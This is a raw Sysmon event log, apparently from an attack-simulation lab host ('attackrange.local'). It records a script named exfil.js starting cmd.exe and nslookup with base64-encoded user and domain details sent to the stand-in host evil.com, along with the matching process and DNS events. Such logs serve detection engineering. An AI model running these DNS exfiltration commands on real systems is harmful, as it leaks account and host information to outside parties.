14:16:29.914{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.914{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.914{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.914{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.913{2E1864BB-17BD-629A-4140-000000005F02}6660C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkatje.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.896{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllzlo.tmpMD5=0E5FCD35CD053EF552028604630DF807,SHA256=10CB74BA0B52EDCD250F65D3C712B6E8DE326D18DDB63A8E97ADD31848C9E0E2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.834{2E1864BB-17BD-629A-3F40-000000005F02}61164908C:\Windows\system32\conhost.exe{2E1864BB-17BD-629A-4040-000000005F02}6148C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.834{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-4040-000000005F02}6148C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000199950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.464{00000000-0000-0000-0000-000000000000}7848<unknown process>-udpfalsefalse127.0.0.1-52656-false127.0.0.1-53domain 10341000x8000000000000000199949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.834{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.463{00000000-0000-0000-0000-000000000000}7848<unknown process>-udptruefalse127.0.0.1-52656-false127.0.0.1-53domain 354300x8000000000000000199947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.463{00000000-0000-0000-0000-000000000000}7848<unknown process>-udpfalsefalse127.0.0.1-52655-false127.0.0.1-53domain 10341000x8000000000000000199946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.834{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.834{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.463{00000000-0000-0000-0000-000000000000}7848<unknown process>-udptruefalse127.0.0.1-52655-false127.0.0.1-53domain 10341000x8000000000000000199943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.834{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.463{00000000-0000-0000-0000-000000000000}7848<unknown process>-udpfalsefalse127.0.0.1-52654-false127.0.0.1-53domain 10341000x8000000000000000199941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.834{2E1864BB-17BD-629A-3E40-000000005F02}26688C:\Windows\system32\cmd.exe{2E1864BB-17BD-629A-4040-000000005F02}6148C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.390{00000000-0000-0000-0000-000000000000}5912<unknown process>-udptruefalse127.0.0.1-52653-false127.0.0.1-53domain 154100x8000000000000000199939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.834{2E1864BB-17BD-629A-4040-000000005F02}6148C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BD-629A-3E40-000000005F02}2668C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllzlo.tmp 2>&1 354300x8000000000000000199938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.390{00000000-0000-0000-0000-000000000000}5912<unknown process>-udpfalsefalse127.0.0.1-52652-false127.0.0.1-53domain 354300x8000000000000000199937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.389{00000000-0000-0000-0000-000000000000}5912<unknown process>-udptruefalse127.0.0.1-52652-false127.0.0.1-53domain 354300x8000000000000000199936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.389{00000000-0000-0000-0000-000000000000}5912<unknown process>-udpfalsefalse127.0.0.1-52651-false127.0.0.1-53domain 354300x8000000000000000199935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.389{00000000-0000-0000-0000-000000000000}5912<unknown process>-udptruefalse127.0.0.1-52651-false127.0.0.1-53domain 10341000x8000000000000000199934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.780{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BD-629A-3F40-000000005F02}6116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.780{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BD-629A-3F40-000000005F02}6116C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.780{2E1864BB-17BD-629A-3F40-000000005F02}61164908C:\Windows\system32\conhost.exe{2E1864BB-17BD-629A-3E40-000000005F02}2668C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.765{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-3F40-000000005F02}6116C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.749{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.749{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.749{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.749{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.749{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-3E40-000000005F02}2668C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.749{2E1864BB-17A1-629A-783D-000000005F02}55525932C:\Windows\System32\WScript.exe{2E1864BB-17BD-629A-3E40-000000005F02}2668C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.761{2E1864BB-17BD-629A-3E40-000000005F02}2668C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllzlo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.749{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlerm.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000199922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.313{00000000-0000-0000-0000-000000000000}7396evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.158{00000000-0000-0000-0000-000000000000}2308evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.031{00000000-0000-0000-0000-000000000000}3796evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.885{00000000-0000-0000-0000-000000000000}1676evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000199918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.756{00000000-0000-0000-0000-000000000000}7632evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000199917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.696{2E1864BB-17BD-629A-3C40-000000005F02}26721136C:\Windows\system32\conhost.exe{2E1864BB-17BD-629A-3D40-000000005F02}7036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 